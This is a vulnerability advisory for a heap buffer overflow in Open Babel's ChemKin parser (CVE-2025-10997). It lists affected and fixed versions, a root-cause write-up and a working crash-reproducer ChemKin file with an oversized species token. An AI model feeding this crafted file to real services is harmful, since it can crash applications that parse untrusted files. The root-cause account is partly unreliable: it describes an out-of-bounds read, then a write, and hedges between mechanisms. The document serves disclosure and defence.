high · 7.8CVE-2025-10997Jul 1, 2026

CVE-2025-10997: Open Babel Heap Buffer Overflow in ChemKin Parser

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

A crafted ChemKin reaction file can corrupt heap memory in Open Babel's species-lookup code, crashing any application that parses untrusted chemistry files.

Packageopenbabel
Ecosystempip
Affected< 3.2.0
Fixed in3.2.0

The problem

The function `ChemKinFormat::CheckSpecies` in `src/formats/chemkinformat.cpp` reads species tokens from a ChemKin REACTIONS block and passes them directly into a `std::map::find` call with no length or bounds validation.

An oversized or malformed species token corrupts the internal string buffer used as the map key. Under ASAN the crash is a heap-buffer-overflow READ of 8 bytes past the allocation boundary, inside `std::map::find` at `stl_map.h:1170`. The overflow is reachable from `ReadReactionQualifierLines`, which calls `CheckSpecies` for every species token on a reaction line.

Proof of concept

A working proof-of-concept for CVE-2025-10997 in openbabel, with the exact payload below.

text
! Minimized ChemKin reproducer for CVE-2025-10997
! Save as crash.ck and run: obabel -i ck crash.ck -o smi
ELEMENTS
H O N C
END
SPECIES
H2 O2 H2O
END
REACTIONS
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+H2O=H2+OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO  1.0E+13  0.0  0.0
END

The ChemKin format uses fixed-column-width fields (16 chars per species name in the canonical spec). Before the patch, `CheckSpecies` performed no length guard: it took the raw parsed token string and used it as a `std::map<std::string, ...>::find` key. When the token was much longer than the internally allocated SSO threshold or any assumed field width, the `std::string` construction itself or a prior `strncpy`-style copy into a fixed heap buffer wrote past the allocation boundary, corrupting adjacent heap metadata.

The fix (commit af4a4212, consolidated in PR #2913) added an explicit length check, rejecting any species token that exceeds the valid field width before it touches the map. CWE-122 (Heap-based Buffer Overflow) applies directly.

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains the fix in commit af4a4212 via PR #2913. If upgrading is not immediately possible, avoid exposing `obabel`, `OBConversion`, or any language binding to untrusted ChemKin files. Distributions shipping 3.1.1 (Debian, Ubuntu, etc.) should apply the distro security patch referenced in the advisory.

Reported by OSS-Fuzz (Google).

References: [1][2][3][4][5][6]

Related research